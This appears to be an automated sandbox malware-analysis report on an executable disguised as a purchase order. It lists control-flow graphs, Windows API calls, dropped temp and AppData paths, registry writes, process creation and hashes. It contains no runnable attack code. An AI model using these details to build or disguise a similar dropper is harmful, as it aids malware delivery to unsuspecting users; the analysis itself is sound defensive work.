                                                              control_flow_graph 611 4024ee-4024f1 612 4024f3-40250a call 402b1d 611->612 613 40250c-402510 611->613 620 40254d-402550 612->620 615 402512-40253c call 402b3a WideCharToMultiByte lstrlenA 613->615 616 40253e-40254b call 402b3a lstrlenW 613->616 615->620 616->620 623 402793-4029d6 620->623 624 402556-402568 call 405eec WriteFile 620->624 624->623
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsh620C.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsh620C.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh620C.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsh620C.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsh620C.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                                              • WriteFile.KERNELBASE(00000000,?,C:\Users\user\AppData\Local\Temp\nsh620C.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritelstrlen
                                                              • String ID: 8$C:\Users\user\AppData\Local\Temp\nsh620C.tmp$C:\Users\user\AppData\Local\Temp\nsh620C.tmp\System.dll
                                                              • API String ID: 1453599865-4112436459
                                                              • Opcode ID: 125d7d9e08fef2fde7f67e3546db7d8161a1fb5accdb6f6421c548297d33fbc9
                                                              • Instruction ID: d62a850ae7ae8d252436c59f910a95d891cc4c78108d860f1a787b3ec39cc5b5
                                                              • Opcode Fuzzy Hash: 125d7d9e08fef2fde7f67e3546db7d8161a1fb5accdb6f6421c548297d33fbc9
                                                              • Instruction Fuzzy Hash: 6A01B971A44204FFD700AFB09E89EAF7278EF51719F20043BB102B61D1C2BC4D41962D

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 630 402573-402588 call 402b1d 633 4029c7-4029ca 630->633 634 40258e-402595 630->634 637 4029d0-4029d6 633->637 635 402597 634->635 636 40259a-40259d 634->636 635->636 638 4025a3-4025b2 call 405eec 636->638 639 4026e6-4026ee 636->639 638->639 643 4025b8 638->643 639->633 644 4025be-4025c2 643->644 645 402657-402667 call 405c7b 644->645 646 4025c8-4025e3 ReadFile 644->646 645->639 651 402669 645->651 646->639 648 4025e9-4025ee 646->648 648->639 650 4025f4-402602 648->650 652 4026a2-4026ae call 405ed3 650->652 653 402608-40261a MultiByteToWideChar 650->653 654 40266c-40266f 651->654 652->637 653->651 656 40261c-40261f 653->656 654->652 657 402671-402676 654->657 659 402621-40262c 656->659 660 4026b3-4026b7 657->660 661 402678-40267d 657->661 659->654 662 40262e-402653 SetFilePointer MultiByteToWideChar 659->662 665 4026d4-4026e0 SetFilePointer 660->665 666 4026b9-4026bd 660->666 661->660 664 40267f-402692 661->664 662->659 663 402655 662->663 663->651 664->639 669 402694-40269a 664->669 665->639 667 4026c5-4026d2 666->667 668 4026bf-4026c3 666->668 667->639 668->665 668->667 669->644 670 4026a0 669->670 670->639
                                                              APIs
                                                              • ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402616
                                                              • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 00402639
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040264F
                                                                • Part of subcall function 00405C7B: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C8F
                                                                • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                              • String ID: 9
                                                              • API String ID: 1149667376-2366072709
                                                              • Opcode ID: 9ac049d87795fdbdd4925ee5a5299b82ae141eed6358a2296866a4b192fc1822
                                                              • Instruction ID: 7a29d1be5ffbe8e369a4709248b8008a71e905d773f4f6332667e592b1311aba
                                                              • Opcode Fuzzy Hash: 9ac049d87795fdbdd4925ee5a5299b82ae141eed6358a2296866a4b192fc1822
                                                              • Instruction Fuzzy Hash: BB51E671E04209ABDF24DF94DA88AAEB779FF04304F50443BE501B62D0D7B99E42CB69

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 671 405234-405249 672 405300-405304 671->672 673 40524f-405260 671->673 674 405262-405266 call 405fae 673->674 675 40526b-405277 lstrlenW 673->675 674->675 677 405294-405298 675->677 678 405279-405289 lstrlenW 675->678 680 4052a7-4052ab 677->680 681 40529a-4052a1 SetWindowTextW 677->681 678->672 679 40528b-40528f lstrcatW 678->679 679->677 682 4052f1-4052f3 680->682 683 4052ad-4052ef SendMessageW * 3 680->683 681->680 682->672 684 4052f5-4052f8 682->684 683->682 684->672
                                                              APIs
                                                              • lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                              • lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                              • lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040528F
                                                              • SetWindowTextW.USER32(004216C8,004216C8), ref: 004052A1
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                              • String ID:
                                                              • API String ID: 2531174081-0
                                                              • Opcode ID: 72a424387536e7fd81286c5d7774de893809cef09252ba040d9bce7e68552ecb
                                                              • Instruction ID: 32bcb3a4223b847dfb51cc2a11ed2745bf7a1ac09c1f1387fae00188f216a620
                                                              • Opcode Fuzzy Hash: 72a424387536e7fd81286c5d7774de893809cef09252ba040d9bce7e68552ecb
                                                              • Instruction Fuzzy Hash: 85219071900658BBCB119F55DD84ADFBFB8EF44350F54807AF904B62A0C7798A41CFA8

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 685 402331-402377 call 402c2f call 402b3a * 2 RegCreateKeyExW 692 4029c7-4029d6 685->692 693 40237d-402385 685->693 695 402387-402394 call 402b3a lstrlenW 693->695 696 402398-40239b 693->696 695->696 699 4023ab-4023ae 696->699 700 40239d-4023aa call 402b1d 696->700 701 4023b0-4023ba call 403062 699->701 702 4023bf-4023d3 RegSetValueExW 699->702 700->699 701->702 706 4023d5 702->706 707 4023d8-4024b2 RegCloseKey 702->707 706->707 707->692 710 402793-40279a 707->710 710->692
                                                              APIs
                                                              • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh620C.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsh620C.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsh620C.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateValuelstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsh620C.tmp
                                                              • API String ID: 1356686001-1036369253
                                                              • Opcode ID: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                              • Instruction ID: 66b2e8a9ee20b684f946803e70458d48747d67842d9f9fe70aa08e99181ad06b
                                                              • Opcode Fuzzy Hash: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                              • Instruction Fuzzy Hash: C3118EB1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D6B85D419A29

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 711 4015b9-4015cd call 402b3a call 405a82 716 401614-401617 711->716 717 4015cf-4015eb call 405a04 CreateDirectoryW 711->717 719 401646-402197 call 401423 716->719 720 401619-401638 call 401423 call 405f8c SetCurrentDirectoryW 716->720 725 40160a-401612 717->725 726 4015ed-4015f8 GetLastError 717->726 732 402793-40279a 719->732 733 4029c7-4029d6 719->733 720->733 736 40163e-401641 720->736 725->716 725->717 729 401607 726->729 730 4015fa-401605 GetFileAttributesW 726->730 729->725 730->725 730->729 732->733 736->733
                                                              APIs
                                                                • Part of subcall function 00405A82: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,?,00405AF6,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,?,?,75572EE0,00405834,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe"), ref: 00405A90
                                                                • Part of subcall function 00405A82: CharNextW.USER32(00000000), ref: 00405A95
                                                                • Part of subcall function 00405A82: CharNextW.USER32(00000000), ref: 00405AAD
                                                              • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                              • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\incontemptible\koput,?,00000000,000000F0), ref: 00401630
                                                              Strings
                                                              • C:\Users\user\AppData\Roaming\incontemptible\koput, xrefs: 00401623
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                              • String ID: C:\Users\user\AppData\Roaming\incontemptible\koput
                                                              • API String ID: 3751793516-1500912455
                                                              • Opcode ID: 01d63cdc09ef030b798e24d03bab5c024d458686720c62c168a7b1a6a2e3207e
                                                              • Instruction ID: c154c5cc2fdcc817133e571beca98f96870035068e51bbb493f84d6d7086355a
                                                              • Opcode Fuzzy Hash: 01d63cdc09ef030b798e24d03bab5c024d458686720c62c168a7b1a6a2e3207e
                                                              • Instruction Fuzzy Hash: 6711C231A04100EBCF206FA0CD44AAE7AB0FF14369B34463BF981B62E1D33D49419A6E

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 738 402b7a-402ba3 RegOpenKeyExW 739 402ba5-402bb0 738->739 740 402c0e-402c12 738->740 741 402bcb-402bdb RegEnumKeyW 739->741 742 402bb2-402bb5 741->742 743 402bdd-402bef RegCloseKey call 4062f6 741->743 745 402c02-402c05 RegCloseKey 742->745 746 402bb7-402bc9 call 402b7a 742->746 750 402bf1-402c00 743->750 751 402c15-402c1b 743->751 748 402c0b-402c0d 745->748 746->741 746->743 748->740 750->740 751->748 753 402c1d-402c2b RegDeleteKeyW 751->753 753->748 755 402c2d 753->755 755->740
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B9B
                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                              • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                              • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Close$DeleteEnumOpen
                                                              • String ID:
                                                              • API String ID: 1912718029-0
                                                              • Opcode ID: b609a681d442e7482c58967ee8632616faae616d75f86d849c2a2114115373ce
                                                              • Instruction ID: 973325e0aa9a645a651b6ee30753ebbcc0ecd75d5609573519e3086a48bf95c6
                                                              • Opcode Fuzzy Hash: b609a681d442e7482c58967ee8632616faae616d75f86d849c2a2114115373ce
                                                              • Instruction Fuzzy Hash: 31113A71904008FEEF229F90DE89EAE3B79FB54348F104476FA05B11A0D3B59E51EA69

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 756 10001759-10001795 call 10001b18 760 100018a6-100018a8 756->760 761 1000179b-1000179f 756->761 762 100017a1-100017a7 call 10002286 761->762 763 100017a8-100017b5 call 100022d0 761->763 762->763 768 100017e5-100017ec 763->768 769 100017b7-100017bc 763->769 770 1000180c-10001810 768->770 771 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 768->771 772 100017d7-100017da 769->772 773 100017be-100017bf 769->773 774 10001812-1000184c call 100015b4 call 100024a9 770->774 775 1000184e-10001854 call 100024a9 770->775 796 10001855-10001859 771->796 772->768 776 100017dc-100017dd call 10002b5f 772->776 778 100017c1-100017c2 773->778 779 100017c7-100017c8 call 100028a4 773->779 774->796 775->796 790 100017e2 776->790 785 100017c4-100017c5 778->785 786 100017cf-100017d5 call 10002645 778->786 787 100017cd 779->787 785->768 785->779 795 100017e4 786->795 787->790 790->795 795->768 800 10001896-1000189d 796->800 801 1000185b-10001869 call 1000246c 796->801 800->760 803 1000189f-100018a0 GlobalFree 800->803 806 10001881-10001888 801->806 807 1000186b-1000186e 801->807 803->760 806->800 809 1000188a-10001895 call 1000153d 806->809 807->806 808 10001870-10001878 807->808 808->806 810 1000187a-1000187b FreeLibrary 808->810 809->800 810->806
                                                              APIs
                                                                • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                              • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                              • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                              • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2369517507.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2369497623.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2369537423.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2369556194.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$Alloc$Librarylstrcpy
                                                              • String ID:
                                                              • API String ID: 1791698881-3916222277
                                                              • Opcode ID: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                              • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                              • Opcode Fuzzy Hash: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                              • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00405C45
                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405C60
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CountFileNameTempTick
                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                              • API String ID: 1716503409-1331003597
                                                              • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                              • Instruction ID: 7ad1723431e3bc490b0335289974808f62bfc0c3cb5a7c029972da154e4cc245
                                                              • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                              • Instruction Fuzzy Hash: B9F09676604308BBEB009F59DC45E9BB7A8EB91710F10803AEA00E7140E2B0AD548B54
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00403192
                                                                • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                              • WriteFile.KERNELBASE(0040BE90,00411BEA,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                              • SetFilePointer.KERNELBASE(0017BA16,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$Pointer$CountTickWrite
                                                              • String ID:
                                                              • API String ID: 2146148272-0
                                                              • Opcode ID: dd796cccabb6a84ac49973fb4d75d79188a42d38f0e762117ceda5c208fcbf67
                                                              • Instruction ID: 5e1569cfb0b545446f3df2febc41285ecf4c3109a81fe664ff5153a665b75745
                                                              • Opcode Fuzzy Hash: dd796cccabb6a84ac49973fb4d75d79188a42d38f0e762117ceda5c208fcbf67
                                                              • Instruction Fuzzy Hash: D9418B72504205DFDB109F29EE84AA63BADF74431671441BFE605B22E1C7B96D418BAC
                                                              APIs
                                                                • Part of subcall function 00405234: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                • Part of subcall function 00405234: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040528F
                                                                • Part of subcall function 00405234: SetWindowTextW.USER32(004216C8,004216C8), ref: 004052A1
                                                                • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                • Part of subcall function 00405703: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 0040572C
                                                                • Part of subcall function 00405703: CloseHandle.KERNEL32(?), ref: 00405739
                                                              • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
